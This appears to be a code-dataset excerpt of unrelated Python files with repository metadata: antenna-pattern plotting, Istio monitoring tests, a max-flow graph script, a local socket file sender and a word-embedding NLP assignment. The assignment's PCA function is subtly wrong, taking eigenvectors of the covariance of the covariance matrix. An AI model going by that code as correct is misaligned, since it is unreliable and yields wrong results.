amp_law.append((minAmp-1-beta) * (2/(N-1))**2 * (n-(N-1)/2)**2 + 1 + beta**2)
elif law == 'poly3':
beta = 0 if N%2!=0 else (1-minAmp)/(N-1)
amp_law.append((minAmp-1-beta) * (2/(N-1))**3 * abs(n-(N-1)/2)**3 + 1 + beta**3)
return np.array(amp_law)
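# Worked example (editor's addition): a 5-element linear taper to 0.5 at the
# edges --
#     get_amplitude_law(5, law='linear', minAmp=0.5)
#     # -> array([0.5, 0.75, 1.0, 0.75, 0.5])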
# Get phase law
def get_circular_phase_law(num_sources, alpha, R, wavelength, phi):
phase_law = []
for n in range(num_sources):
phase_law.append(2 * np.pi / wavelength * (2 * R * np.sin(n * alpha)) * np.sin(phi + n * alpha))
return phase_law
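# (Editor's note) 2*pi/wavelength is the wavenumber k; 2*R*sin(n*alpha) acts as
# an effective per-element spacing and sin(phi + n*alpha) as the steering term
# toward the commanded angle phi.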
def get_circular_pattern(num_sources, R, wavelength, phi, logScale=True, ccw=True):
alpha = 2 * np.pi / num_sources
amp_law = np.ones(num_sources)
phase_law = get_circular_phase_law(num_sources, alpha, R, wavelength, phi)
theta = np.arange(0, 2*np.pi, np.radians(0.1))
mag = []
for theta_i in theta:
im = re = 0
# Phase shift due to off-boresight angle
# Compute sum of effects of elements
for n in range(num_sources):
if ccw:
factor = n * alpha
else:
factor = -n * alpha
psi = np.sin(theta_i + n * alpha )
coeff = 2 * np.pi / wavelength * (2 * R * np.sin(n * alpha))
# using constant amplitude law for simplicity #TODO: will be optimized in pyRoomAcoustics
im += np.sin(coeff * (psi + np.sin(phi + factor)))
re += np.cos(coeff * (psi + np.sin(phi + factor)))
magnitude = np.sqrt(re**2 + im**2)/num_sources
if logScale:
magnitude = 20*np.log10(magnitude)
mag.append(magnitude)
return theta, mag, amp_law, phase_law
def plot_pattern(theta, mag, amp_law, phase_law, polar=False, output_file=None):
"""Plots a magnitude pattern, amplitude law and phase law.
Optionnally, it can export the pattern to output_file.
"""
# Default size & dpi
plt.figure(figsize=(10,4),dpi=100)
# Plot pattern
if polar:
ax = plt.subplot(131, polar=True)
ax.plot(theta, mag)
ax.set_theta_zero_location("N")
ax.set_thetalim(0, 2*np.pi)
else:
ax = plt.subplot(131)
ax.plot(theta,mag)
ax.grid(True)
ax.set_xlim([0, 2*np.pi])
        ax.set_xlabel('radians')
plt.ylim(top=0)
plt.title("Antenna pattern - circular array")
# Plot amplitude law
ax = plt.subplot(132)
ax.plot(range(len(amp_law)), amp_law, marker='o')
ax.set_ylim([0,1])
plt.title("Amplitude law")
print("Amplitude law:")
print(amp_law)
# Plot phase law
ax = plt.subplot(133)
plt.title("Phase law")
ax.plot(range(len(phase_law)),np.rad2deg(phase_law), marker='o')
print("Phase law:")
print(phase_law)
# Show and save plot
if output_file is not None:
plt.savefig(output_file + '.png')
np.savetxt(output_file + '.txt', np.transpose([theta,mag]),
delimiter='\t', header="Angle [deg]\tMagnitude [dB]")
plt.show()
def main(args):
# Parameters
N = args.number_elements # Elements
c = args.wave_celerity #m/s
f = args.frequency #Hz
    phi = np.radians(args.steering_angle) # steering angle given in degrees, converted to radians
    polar = args.polar #True=polar pattern, False=cartesian pattern
logScale = args.log_scale #True=output in dB, False=linear output
output_file = 'pattern_' + str(N) if args.save_output else None
wavelength = c/f #m
theta, mag, amp_law, phase_law = get_circular_pattern(num_sources=N, R=0.1, wavelength=wavelength, phi=phi, logScale=logScale)
plot_pattern(theta, mag, amp_law,phase_law,polar,output_file=output_file)
if __name__ == '__main__':
args = get_args()
main(args)
| [
"[email protected]"
] | |
8f35b00ec2863b4bc1ed7fe3a963aa23f295757d | b57b0a14df5c6841f04cccb7b02ad04afbca18f8 | /istio/tests/test_istio_1_5.py | 3b34e35c23c2b215618191c3b6ee30ea493de837 | [
"AFL-3.0",
"BSD-3-Clause-Modification",
"LGPL-3.0-only",
"Unlicense",
"LGPL-2.1-only",
"BSD-3-Clause",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | zeroc0d3/integrations-core | d9c99803c049668b7f9f9c796d338e343d3d46ee | 634d567f3c38d32aabb3f4c16b50bcfa8a4ae0fb | refs/heads/master | 2021-09-28T18:37:00.650406 | 2021-09-13T11:59:45 | 2021-09-13T11:59:45 | 199,758,958 | 0 | 0 | BSD-3-Clause | 2019-07-31T02:01:25 | 2019-07-31T02:01:24 | null | UTF-8 | Python | false | false | 3,149 | py | # (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import requests_mock
from datadog_checks.dev.utils import get_metadata_metrics
from datadog_checks.istio import Istio
from . import common
from .utils import _assert_tags_excluded, get_response
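# Note (added): every test below follows the same pattern -- requests_mock
# intercepts the HTTP GET the check issues against its metrics endpoint and
# serves a recorded fixture, so the assertions run on deterministic data.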
def test_legacy_istiod(aggregator):
"""
Test the istiod deployment endpoint for v1.5+ check
"""
check = Istio('istio', {}, [common.MOCK_LEGACY_ISTIOD_INSTANCE])
with requests_mock.Mocker() as metric_request:
metric_request.get('http://localhost:8080/metrics', text=get_response('1.5', 'istiod.txt'))
check.check(common.MOCK_LEGACY_ISTIOD_INSTANCE)
for metric in common.ISTIOD_METRICS:
aggregator.assert_metric(metric)
aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_submission_type=True)
aggregator.assert_all_metrics_covered()
def test_legacy_proxy_mesh(aggregator):
"""
Test proxy mesh check
"""
check = Istio(common.CHECK_NAME, {}, [common.MOCK_LEGACY_MESH_INSTANCE])
with requests_mock.Mocker() as metric_request:
metric_request.get('http://localhost:15090/metrics', text=get_response('1.5', 'istio-proxy.txt'))
check.check(common.MOCK_LEGACY_MESH_INSTANCE)
for metric in common.LEGACY_MESH_METRICS + common.MESH_MERICS_1_5:
aggregator.assert_metric(metric)
_assert_tags_excluded(aggregator, [])
aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_submission_type=True)
aggregator.assert_all_metrics_covered()
def test_istio_proxy_mesh_exclude(aggregator):
"""
Test proxy mesh check
"""
exclude_tags = ['destination_app', 'destination_principal']
instance = common.MOCK_LEGACY_MESH_INSTANCE
instance['exclude_labels'] = exclude_tags
check = Istio(common.CHECK_NAME, {}, [instance])
with requests_mock.Mocker() as metric_request:
metric_request.get('http://localhost:15090/metrics', text=get_response('1.5', 'istio-proxy.txt'))
check.check(instance)
for metric in common.LEGACY_MESH_METRICS + common.MESH_MERICS_1_5:
aggregator.assert_metric(metric)
_assert_tags_excluded(aggregator, exclude_tags)
aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_submission_type=True)
aggregator.assert_all_metrics_covered()
def test_legacy_version_metadata(datadog_agent):
check = Istio(common.CHECK_NAME, {}, [common.MOCK_LEGACY_ISTIOD_INSTANCE])
check.check_id = 'test:123'
with requests_mock.Mocker() as metric_request:
metric_request.get('http://localhost:8080/metrics', text=get_response('1.5', 'istiod.txt'))
check.check(common.MOCK_LEGACY_ISTIOD_INSTANCE)
# Use version mocked from istiod 1.5 fixture
MOCK_VERSION = '1.5.0'
major, minor, patch = MOCK_VERSION.split('.')
version_metadata = {
'version.scheme': 'semver',
'version.major': major,
'version.minor': minor,
'version.patch': patch,
'version.raw': MOCK_VERSION,
}
datadog_agent.assert_metadata('test:123', version_metadata)
| [
"[email protected]"
] | |
d66f55673cf2057f85cac998e95c9393c4a3fc95 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/neal.py | a9b23af628c29baef5be38fc3499691d0ef5fd97 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 274 | py | ii = [('CookGHP3.py', 1), ('WilbRLW4.py', 1), ('AdamWEP.py', 1), ('ClarGE2.py', 3), ('AdamHMM.py', 1), ('ClarGE.py', 11), ('GilmCRS.py', 1), ('DaltJMA.py', 1), ('GodwWLN.py', 2), ('SoutRD2.py', 3), ('WheeJPT.py', 2), ('MereHHB.py', 1), ('DibdTRL.py', 1), ('SadlMLP2.py', 1)] | [
"[email protected]"
] | |
618c8454e39c26836efdcd1b025c4b926ae44d83 | 67ef0a3f31c141e0cb156cb3d278091e63b32dfd | /0x07-python-test_driven_development/4-print_square.py | 5c4a6a2d4961caeeb26163218545e2b26947a288 | [] | no_license | Orcha02/holbertonschool-higher_level_programming | 7078ac665f027b845a55a8499764cfce78d89eec | 1d0136aef388ede1ecbe625b303e07c177fee52e | refs/heads/main | 2023-08-22T10:04:56.495834 | 2021-09-23T02:56:36 | 2021-09-23T02:56:36 | 361,823,730 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | #!/usr/bin/python3
""" Function that prints a square """
def print_square(size):
""" function that prints a square with the character #. """
    if type(size) is float and size < 0:
        raise TypeError("size must be an integer")
    if type(size) is not int:
        raise TypeError("size must be an integer")
    if size < 0:
        raise ValueError("size must be >= 0")
for i in range(size):
print("{}".format("#" * size))
| [
"[email protected]"
] | |
cba11837296d1468a2f7aad89d33ddce44995fda | 388e054480b4a26e602b213967e3c4bec9ae96d5 | /server.py | 2237b54355bd547c3c26e68f67605a0f0f4a4c09 | [] | no_license | budinugroho13/Ftp-sederhana | b035211602269e450ffc3552203d96af4e807f7a | cf2accb3faa3921aca37163d35524c6b99eeaff5 | refs/heads/master | 2022-04-19T14:09:10.748831 | 2020-04-16T05:18:30 | 2020-04-16T05:18:30 | 256,115,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,774 | py | # import socket
# import tqdm
# import os
# # ip addres yang digunakan
# SERVER_HOST = "0.0.0.0"
# SERVER_PORT = 5001
# # menerima 4096
# BUFFER_SIZE = 4096
# SEPARATOR = "<SEPARATOR>"
# # membuat socket
# # TCP socket
# s = socket.socket()
# # bind socket sebagai local address
# s.bind((SERVER_HOST, SERVER_PORT))
# s.listen(5)
# print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
# # menerima koneksi
# client_socket, address = s.accept()
# # jika ada user konek akan tereksekusi
# print(f"[+] {address} is connected.")
# # menerima info file
# received = client_socket.recv(BUFFER_SIZE).decode()
# filename, filesize = received.split(SEPARATOR)
# filename = os.path.basename(filename)
# # mengubah string menjad integer
# filesize = int(filesize)b
# # mulai menerima file dari socket
# progress = tqdm.tqdm(range(
# filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024)
# with open(filename, "wb") as f:
# for _ in progress:
# bytes_read = client_socket.recv(BUFFER_SIZE)
# if not bytes_read:
# break
# # menulis besaran bytes file yang di terima
# f.write(bytes_read)
# # update progress bar grafik
# progress.update(len(bytes_read))
# client_socket.close()
# s.close()
import socket # Import socket module
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 12345 # Reserve a port for your service.
s.connect((host, port))
s.send(b"Hello masbud!")
f = open('coba.txt','rb')
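# Note (added comment): despite the "downloading" messages below, this block
# is the client side of the transfer -- it streams the local file coba.txt to
# the server in 1024-byte chunks over the connected socket.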
print ('downloading...')
l = f.read(1024)
while (l):
print ('downloading...')
s.send(l)
l = f.read(1024)
f.close()
print ("Done downloading")
print (s.recv(1024))
s.close()  # close the socket once the transfer is done
| [
"[email protected]"
] | |
ee7ad7136607639eb8a04211e9c3183c5cecb2e7 | 707723ab7908db14c2caa0a3f590bae1ef4ae8ac | /data/ageBuild/rd_btx_ageb.py | beed4c8deebb91f86701de2caeb663ef2bbbd4c8 | [] | no_license | mvalari/EXPLUME | a57e9cd320bb7519267af599ae6fa763956b286f | f90d4474ca54e29fec872ea7016a51b93f7a3bcb | refs/heads/master | 2020-06-25T01:05:55.354526 | 2019-03-04T14:21:27 | 2019-03-04T14:21:27 | 199,148,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,481 | py | import pickle
import numpy as np
ageBins=[]#=[0, 15, 20, 25, 40, 55, 65, 80]
cnsDates=[]
comIds=[]
#Read once to get comIds, ageBins, and dates
f=open('BTX_TD_AGEB_2008.ins','r')
for i,ln in enumerate(f):
if i>0:
        comId,sex,age,typ,ageB,cnt=ln.split()  # 'typ' avoids shadowing the built-in type()
if comId not in comIds:comIds.append(comId)
if age not in ageBins:ageBins.append(age)
if ageB not in cnsDates:cnsDates.append(ageB)
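# Note (added): the input file is deliberately read twice -- this first pass
# only collects the distinct commune ids, age bins and construction-date bins
# so the arrays below can be sized before the second pass accumulates counts.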
data2d={}
for com in comIds:
data2d[com]={}
data2d[com]=np.zeros((len(ageBins),len(cnsDates)))
ageBins=sorted(ageBins)
cnsDates=sorted(cnsDates)
f.seek(0)
for i,ln in enumerate(f):
if i>0:
        comId,sex,age,typ,ageB,cnt=ln.split()
data2d[comId][ageBins.index(age),cnsDates.index(ageB)]=data2d[comId][ageBins.index(age),cnsDates.index(ageB)]+int(cnt)
f.close()
data2dr={}
for com in data2d.keys():
data2dr[com]=np.zeros((4,18))
data2dr[com][0,:]=np.array([round(i) for i in 0.25*data2d[com][1,:]])
data2dr[com][1,:]=np.array([round(i) for i in 0.75*data2d[com][1,:]])
data2dr[com][2,:]=data2d[com][2,:]+data2d[com][3,:]+data2d[com][4,:]+data2d[com][5,:]
data2dr[com][3,:]=data2d[com][6,:]+data2d[com][7,:]
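# Note (added): the block above collapses the 8 source age bins into 4 output
# groups; the 0.25/0.75 split apportions the counts of source bin 1 between
# the first two output groups.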
fout=open('BUILDING_AGE_MVAL.ins','w')
for com in data2dr.keys():
for date in range(len(cnsDates)):
fout.write(com +' ; '+str(int(data2dr[com][0,date])) +' ; '+str(int(data2dr[com][1,date])) +' ; '+str(int(data2dr[com][2,date])) +' ; '+str(int(data2dr[com][3,date])) +' ; '+str(cnsDates[date])+'\n')
fout.close()
| [
"[email protected]"
] | |
210775055ec3d9710db431bf6467c57b98377d24 | 5e260d0cde3e77f310bb80ba48319376c067b989 | /Tarea5/GrafoTarea5.py | 2740b2c59c96b74a086330da0f78fdb09f8a7ae2 | [] | no_license | EvelyGutierrez/Optimizacion-de-flujo-de-redes | 4f0674d945ca1ef7305c75e5f81b48e67f3317eb | 6f2405847022cc230fcfc9ddbe5a5e9a60cd86d6 | refs/heads/master | 2021-05-09T09:48:25.294949 | 2018-05-27T21:14:43 | 2018-05-27T21:14:43 | 119,458,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,086 | py | from random import random, uniform, randint, gauss, expovariate
from math import sqrt, ceil, floor, factorial, cos, sin, pi
from datetime import datetime
from time import clock
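# Note (added): time.clock() was deprecated in Python 3.3 and removed in 3.8;
# time.perf_counter() is the usual replacement on modern interpreters.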
def cabecera(aristas, k, eps=True):
if eps:
print("set term postscript color eps", file = aristas)
print("set output 'GrafoGrid.eps'", file = aristas)
else:
print("set term png", file = aristas)
print("set output 'GrafoGrid.png'", file = aristas)
print('set xrange [-1:', k , ']', file = aristas)
print('set yrange [-1:', k , ']', file = aristas)
print('set size square', file = aristas)
print('set key off', file = aristas)
def pie(destino, aristas):
print("plot '{:s}' using 1:2 with points pt 5 ps 1".format(destino), file = aristas)
class Grafo:
def __init__(self):
self.x = dict()
self.y = dict()
self.nodos = dict()
self.aristas = []
self.vecinos = dict()
self.peso = 1
self.destino = None
def agregaNodos(self,v,x,y):
self.nodos[v] = (x,y)
        if not v in self.vecinos: # neighborhood of v
            self.vecinos[v] = set() # initially empty
with open("GraficaNodos.txt", 'a') as archivo:
print(x,y,v, file = archivo)
def puntos(self, dest, k):
self.destino = dest
with open(self.destino, 'w') as puntos:
it= 0
for i in range(k):
for j in range(k):
x = i
y = j
self.agregaNodos(it,x,y)
it += 1
# print("nodos")
#print(self.nodos)
    def Grafica(self, plot, k): # print the graph with its edges
assert self.destino is not None
with open(plot, 'w') as puntos:
cabecera(puntos, k)
num = 1
for (v, w, p, c) in self.aristas:
(x1, y1) = self.nodos[v]
(x2, y2) = self.nodos[w]
flecha = "set arrow {:d} from {:f}, {:f} to {:f}, {:f} lt 3 lw {:f} lc rgb '{:s}' nohead ".format(num,x1,y1,x2,y2,p, c)
print(flecha, file=puntos)
num += 1
pie(self.destino, puntos)
print(len(self.aristas))
def GraficaNodos(self, plot, k):
with open(plot, 'w') as puntos:
cabecera(puntos, k)
puntoss = "plot 'GraficaNodos.txt' with points pt 4"
print(puntoss, file=puntos)
def getManhattan(self, a,b):
(x1, y1) = self.nodos[a]
(x2, y2) = self.nodos[b]
dx = abs(x1 - x2)
dy = abs(y1 - y2)
md = dx + dy
return(md)
def manhattan(self, k, l, p):
mu = 10
sigma = 5
lmbd = 2
color = 'black'
cantidad = 0
peso1 = 0
peso2 = 0
        # connect nodes within Manhattan distance l
for i in self.nodos:
for j in self.nodos:
if (self.getManhattan(i,j) <= l):
peso1 = gauss(mu,sigma)
peso1 = abs(int(peso1))+1
self.aristas.append((i, j, peso1, color))
self.aristas.append((j, i, peso1, color))
self.vecinos[i].add(j)
self.vecinos[j].add(i)
elif (random() < p) :
color2 = 'blue'
cantidad += 1
peso2 = expovariate(lmbd)*mu/4
peso2 = abs(int(peso2))+1
self.aristas.append((i, j, peso2, color2))
self.vecinos[i].add(j)
        #print('Number of random edges')
#print(cantidad)
print("Aristas******")
print(len(self.aristas))
#print(self.vecinos)
    def camino(self, s, t, f): # build an augmenting path
cola = [s]
usados = set()
camino = dict()
while len(cola) > 0:
u = cola.pop(0)
usados.add(u)
for (w, v, p, c) in self.aristas:
if w == u and v not in cola and v not in usados:
actual = f.get((u, v), 0)
dif = p - actual
if dif > 0:
cola.append(v)
camino[v] = (u, dif)
if t in usados:
return camino
        else: # t was not reached
return None
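    # Note (added): camino() is a breadth-first search over the residual
    # network: dif = p - actual is the remaining capacity of edge (u, v) under
    # the flow f built so far, and the returned dict maps each reached node to
    # (predecessor, residual capacity) so the caller can walk back from t.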
    def FordFulkerson(self, s, t): # Ford-Fulkerson algorithm
if s == t:
return 0
maximo = 0
f = dict()
while True:
aum = self.camino(s, t, f)
if aum is None:
                break # no augmenting paths left
incr = min(aum.values(), key = (lambda k: k[1]))[1]
u = t
while u in aum:
v = aum[u][0]
            actual = f.get((v, u), 0) # zero if absent
inverso = f.get((u, v), 0)
f[(v, u)] = actual + incr
f[(u, v)] = inverso - incr
u = v
maximo += incr
return maximo
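    # Illustrative usage (added, hedged -- node ids are assumptions):
    #   g = Grafo(); g.puntos("GraficaNodos.txt", 5); g.manhattan(5, 2, p=0.01)
    #   print(g.FordFulkerson(0, 24))  # max flow between opposite grid corners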
    def EliminaArista(self, u, v):
        # Remove every stored edge between nodes u and v, in both directions;
        # discard() keeps this safe when one direction was never registered.
        self.aristas = [a for a in self.aristas
                        if not ((a[0] == u and a[1] == v) or (a[0] == v and a[1] == u))]
        self.vecinos[u].discard(v)
        self.vecinos[v].discard(u)
        print(len(self.aristas))
def EliminaNodo(self, u):
vecindad = self.vecinos[u].copy()
for i in vecindad:
print("quité arista con",i)
self.EliminaArista(u,i)
for n in self.nodos:
if u in self.vecinos[n]:
print("uy quité arista con",n)
self.EliminaArista(n,u)
        self.nodos.pop(u)
print(self.nodos)
print(len(self.aristas))
    def PlotDiagrama1(self, plot, diagrama): # plot: L distances vs. maximum flow
with open(plot, "w") as diagrama:
print("set term postscript color eps", file = diagrama)
print("set output 'DiaLVSFlujo.eps'", file = diagrama)
print("set key off", file = diagrama)
print("set xlabel 'Flujo Máximo'", file = diagrama)
print("set ylabel 'Valores de Distancia L'", file = diagrama)
#set logscale y
print("set style fill solid 0.25 border -1", file = diagrama)
print("set style line 1 lt 1 linecolor rgb 'blue' lw 2 pt 1", file = diagrama)
print("set style data boxplot", file = diagrama)
#f(x) = 150 * exp(x) - 12
diagrama1 = "plot 'TiempoLVSFM.txt' using 1:2 ls 1 title 'Distancias VS Flujo Máximo' with lines "
print(diagrama1, file=diagrama)
    def PlotDiagrama2(self, plot, diagrama): # plot: removed edges vs. maximum flow
with open(plot, "w") as diagrama:
print("set term postscript color eps", file = diagrama)
print("set output 'DiaArisVSFlujo.eps'", file = diagrama)
print("set key off", file = diagrama)
print("set xlabel 'Flujo Máximo'", file = diagrama)
print("set ylabel 'Aristas Eliminadas'", file = diagrama)
#set logscale y
print("set style fill solid 0.25 border -1", file = diagrama)
print("set style boxplot outliers pointtype 7", file = diagrama)
print("set style data boxplot", file = diagrama)
#f(x) = 150 * exp(x) - 12
diagrama2 = "plot 'AristasVSFlujo.txt' using 1:2 "
print(diagrama2, file=diagrama)
k = 20
n = k * k
l = 2
x = 0
flujoMaximo = []
fo = 10
cantAristas = 0
with open("AristasVSFlujo.txt", "a") as f:
with open("TiempoEjecucion.txt", "a") as d:
for t in range(0, 1):
print("Iteracion ------------------------------------------ " + str(l))
G1 = Grafo()
G1.puntos("GraficaNodos.txt", k)
G1.GraficaNodos("NodosGrid.plot", k)
#G1.quitar_nodo(3)
            TiempoInicial = clock() # start time
G1.manhattan(k, l, p = 0.008)
#FlujoMaximo = G1.FordFulkerson(0, n - 1)
#print("Flujo Original")
#print(FlujoMaximo)
G1.Grafica("GrafoGrid.plot", k)
FlujoMaximo=0
for x in range(0, fo):
print(x)
cantAristas = cantAristas + 2
G1.EliminaArista(x, x+1)
#G1.EliminaNodo(5)
FlujoMaximo = G1.FordFulkerson(0, n - 1)
print('Flujo maximo eliminando')
print(FlujoMaximo)
flujoMaximo.append( FlujoMaximo)
f.write('{} {} {} \n'.format(cantAristas , fo, '%.2f' % FlujoMaximo))
TiempoFinal = clock() - TiempoInicial
d.write('{} {} \n'.format('%.2f' % TiempoFinal, '%.2f' % x))
print("Tiempo de ejecucion: ")
print(TiempoFinal)
l += 1
G1.PlotDiagrama2("DiaAriVSFlujo.plot", "AristasVSFlujo")
| [
"[email protected]"
] | |
d649d41ce316b48c42f29c9f9d76f08d614277f3 | 93e298426c8bc05af9c6dc9ba0d15386a862ada0 | /guess v.0.1.1.py | 042d33c1099960bdd2c365e5371ffa4f207e4262 | [] | no_license | MagicBackup2018/SchoolProject1 | de37d24500052495a164192dea346c2441152837 | a89d2502f1b83445e967fa7a1f1fb97cd3af71ac | refs/heads/master | 2020-04-10T01:51:38.624991 | 2018-12-07T11:04:46 | 2018-12-07T11:04:46 | 160,727,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,798 | py | """Bagels, a number puzzle game.
Exercises:
1. Can you guess the number?
2. How much harder is 6 digits? Do you need more guesses?
3. What's the maximum number of digits we could support?
Adapted from code in https://inventwithpython.com/chapter11.html
"""
from random import sample, shuffle
digits = 3
guesses = 10
print('I am thinking of a', digits, 'digit number.')
print('Try to guess what it is.')
print('Here are some clues:')
print('When I say: That means:')
print(' pico One digit is correct but in the wrong position.')
print(' fermi One digit is correct and in the right position.')
print(' bagels No digit is correct.')
print('There are no repeated digits in the number.')
# Create a random number.
letters = sample('0123456789', digits)
if letters[0] == '0':
letters.reverse()
number = ''.join(letters)
print('I have thought up a number.')
print('You have', guesses, 'guesses to get it.')
counter = 1
while True:
print('Guess #', counter)
guess = input()
if len(guess) != digits:
print('Wrong number of digits. Try again!')
continue
# Create the clues.
clues = []
for index in range(digits):
if guess[index] == number[index]:
clues.append('fermi')
elif guess[index] in number:
clues.append('pico')
shuffle(clues)
if len(clues) == 0:
print('bagels')
else:
print(' '.join(clues))
counter += 1
if guess == number:
print('You got it! in ' , counter , 'Guesses')
print('Least no. of Guesses is' , counter_least)
break
if counter > guesses:
print('You ran out of guesses. The answer was', number)
break
| [
"[email protected]"
] | |
9e169041eceb4d706cd68dba965f55dd679f9a94 | c305a0971486efd74b688b43d14432afd99f91e8 | /assignments/weekly3/C1_W3_Assignment.py | 4fbbcd413cdc97b267c49f1151739a8749edc864 | [] | no_license | ckharide/nlplearn | cba1e435bbfd39dda7b15e6f974c63c605a35ede | b614b8c780fdb1064443137de04ef46756aad216 | refs/heads/main | 2023-04-16T08:18:55.620804 | 2021-04-27T12:49:49 | 2021-04-27T12:49:49 | 352,520,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,186 | py | import pickle
import numpy as np
import pandas as pd
#import matplotlib.pyplot as plt
from utils import get_vectors
data = pd.read_csv('capitals.txt', delimiter=' ')
data.columns = ['city1', 'country1', 'city2', 'country2']
# print first five elements in the DataFrame
print(data.head(5))
print(data.shape)
word_embeddings = pickle.load(open("word_embeddings_subset.p", "rb"))
print("Length of word embeddigns " , len(word_embeddings)) # there should be 243 words that will be used in this assignment
#print("dimension: {}".format(word_embeddings['Germany']))
def cosine_similarity(A, B):
'''
Input:
A: a numpy array which corresponds to a word vector
B: A numpy array which corresponds to a word vector
Output:
cos: numerical number representing the cosine similarity between A and B.
'''
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
dot = np.dot(A,B)
norma = np.linalg.norm(A)
normb = np.linalg.norm(B)
cos = dot / (norma * normb)
### END CODE HERE ###
return cos
king = word_embeddings['king']
queen = word_embeddings['queen']
print(cosine_similarity(king, queen))
def euclidean(A, B):
"""
Input:
A: a numpy array which corresponds to a word vector
B: A numpy array which corresponds to a word vector
Output:
d: numerical number representing the Euclidean distance between A and B.
"""
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# euclidean distance
d = np.linalg.norm(A-B)
### END CODE HERE ###
return d
print(euclidean(king, queen))
def get_country(city1, country1, city2, embeddings):
"""
Input:
city1: a string (the capital city of country1)
country1: a string (the country of capital1)
city2: a string (the capital city of country2)
embeddings: a dictionary where the keys are words and values are their embeddings
Output:
countries: a dictionary with the most likely country and its similarity score
"""
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# store the city1, country 1, and city 2 in a set called group
group = set((city1, country1, city2))
# get embeddings of city 1
city1_emb = embeddings[city1]
# get embedding of country 1
country1_emb = embeddings[country1]
# get embedding of city 2
city2_emb = embeddings[city2]
# get embedding of country 2 (it's a combination of the embeddings of country 1, city 1 and city 2)
# Remember: King - Man + Woman = Queen
vec = country1_emb - city1_emb + city2_emb
# Initialize the similarity to -1 (it will be replaced by a similarities that are closer to +1)
similarity = -1
# initialize country to an empty string
country = ''
# loop through all words in the embeddings dictionary
for word in embeddings.keys():
# first check that the word is not already in the 'group'
if word not in group:
# get the word embedding
word_emb = word_embeddings[word]
# calculate cosine similarity between embedding of country 2 and the word in the embeddings dictionary
cur_similarity = cosine_similarity(word_emb,vec)
# if the cosine similarity is more similar than the previously best similarity...
if cur_similarity > similarity:
# update the similarity to the new, better similarity
similarity = cur_similarity
# store the country as a tuple, which contains the word and the similarity
country = (word, similarity)
### END CODE HERE ###
return country
country_pred = get_country('Athens', 'Greece', 'Cairo', word_embeddings)
print(country_pred)
def get_accuracy(word_embeddings, data):
'''
Input:
word_embeddings: a dictionary where the key is a word and the value is its embedding
data: a pandas dataframe containing all the country and capital city pairs
Output:
accuracy: the accuracy of the model
'''
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# initialize num correct to zero
num_correct = 0
# loop through the rows of the dataframe
for i, row in data.iterrows():
# get city1
city1 = row['city1']
# get country1
country1 = row['country1']
# get city2
city2 = row['city2']
# get country2
country2 = row['country2']
# use get_country to find the predicted country2
predicted_country2, _ = get_country(city1 , country1 , city2 , word_embeddings)
# if the predicted country2 is the same as the actual country2...
if predicted_country2 == country2:
# increment the number of correct by 1
num_correct += 1
# get the number of rows in the data dataframe (length of dataframe)
m = len(data)
# calculate the accuracy by dividing the number correct by m
accuracy = num_correct / m
### END CODE HERE ###
return accuracy
accuracy = get_accuracy(word_embeddings, data)
print(f"Accuracy is {accuracy:.2f}")
def compute_pca(X, n_components=2):
"""
Input:
X: of dimension (m,n) where each row corresponds to a word vector
n_components: Number of components you want to keep.
Output:
X_reduced: data transformed in 2 dims/columns + regenerated original data
"""
print("Shape of X " , X.shape[1])
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# mean center the data
X_demeaned = X - np.mean(X, axis=0)
# calculate the covariance matrix
covariance_matrix = np.cov(X, rowvar=False)
# calculate eigenvectors & eigenvalues of the covariance matrix
eigen_vals, eigen_vecs = np.linalg.eigh(np.cov(covariance_matrix))
# sort eigenvalue in increasing order (get the indices from the sort)
idx_sorted = np.argsort(eigen_vals)
# reverse the order so that it's from highest to lowest.
idx_sorted_decreasing = idx_sorted[::-1]
# sort the eigen values by idx_sorted_decreasing
eigen_vals_sorted = eigen_vals[idx_sorted_decreasing]
# sort eigenvectors using the idx_sorted_decreasing indices
eigen_vecs_sorted = eigen_vecs[:,idx_sorted_decreasing]
# select the first n eigenvectors (n is desired dimension
# of rescaled data array, or dims_rescaled_data)
eigen_vecs_subset = eigen_vecs_sorted[:,0:n_components]
# transform the data by multiplying the transpose of the eigenvectors
# with the transpose of the de-meaned data
# Then take the transpose of that product.
print(eigen_vecs_subset.T.shape)
print(X_demeaned.T.shape)
print(X_demeaned.shape)
X_reduced = np.dot(eigen_vecs_subset.transpose(),X_demeaned.transpose()).transpose()
### END CODE HERE ###
return X_reduced
np.random.seed(1)
X = np.random.rand(3, 10)
X_reduced = compute_pca(X, n_components=2)
print("Your original matrix was " + str(X.shape) + " and it became:")
print(X_reduced)
print(np.asscalar(np.array([1 , 2 , 1])))
| [
"[email protected]"
] | |
